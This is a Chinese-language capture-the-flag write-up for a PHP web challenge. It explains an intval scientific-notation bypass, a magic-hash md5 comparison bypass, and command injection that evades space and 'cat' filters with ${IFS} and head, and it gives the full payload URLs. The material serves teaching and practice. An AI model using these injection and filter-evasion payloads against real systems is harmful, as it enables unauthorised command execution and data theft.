首先进来不知道要干啥,上dirsearch扫出个机器人协议,一看有点东西
直接访问很明显这不是flag
主页面看他说什么不能修改头部,看一下数据包
发现了好东西
看到源码,又得绕过了。不过这编码有点问题导致乱码了
找个在线网站稍微恢复了下,我把这个分为三块讲解
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,
科学计数法绕过
处理整型1e10当做科学计数法正常处理;字符串型1e10如果第一个字符不是数字就返回0,是数字就返回1;当用字符串形式的科学计数法运算会自动转换成整型
echo intval(1e10); // 1410065408
echo intval('1e10'); // 1
echo intval('1e10'+1); // 1410065409
所以此处我们可以构造payload:num=3e3 (3乘10的三次方即可满足条件)
第二处则是md5函数绕过,0e215962017
的 MD5 值也是由 0e 开头,php在利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以构造payload:md5=0e215962017
第三块if(!strstr($get_flag," "))让get_flag值不能有空格,str_ireplace("cat", "wctf2020", $get_flag);又替换我们的cat命令,最方便的是用其他来替代即可免得改造东西来绕过函数
空格我们可以用IFS来代替,使用的时候加上$和{}作为整体变量使用;替换cat我们就不用cat,查看命令多的是,我就用head,10行足够显示了
代替空格可以用这三个:${IFS} $IFS$9 <,我试了双尖括号不行
先看下藏flag的文件名,payload:fl4g.php?num=3e3&md5=0e215962017&get_flag=ls
肯定是最长的这玩意
最终payload:fl4g.php?num=3e3&md5=0e215962017&get_flag=head${IFS}fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag